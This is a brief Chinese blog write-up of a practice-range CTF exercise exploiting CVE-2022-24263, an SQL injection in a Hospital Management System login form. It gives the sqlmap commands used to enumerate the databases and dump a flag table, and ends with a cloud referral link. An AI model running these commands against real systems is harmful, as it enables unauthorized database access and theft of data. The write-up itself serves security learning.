CVE-2022-24263

简介

是一个医院管理系统----Hospital Management System，存在sqli漏洞。

本人使用春秋云境免费靶场在线搭建。

详解

github找到了该漏洞的介绍。注入点在登录框。

1. 输入账户密码登录，抓包

1683602856871.png

1. 有三个登录框测试一下，三个都可以。将request保存为sqli.txt文件

2023-05-09T03:29:36.png

1. 使用sqlmap注入，命令如下

sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -dbs 

Bash

1. flag在ctf数据库的falg表中

sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -D ctf -T flag --dump

Bash

Github点击here

结语

我加入了腾讯云自媒体分享计划，可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。 我的博客即将同步至腾讯云开发者社区，邀请大家一同入驻：https://cloud.tencent.com/developer/support-plan?invite_code=1f93zvim5fqci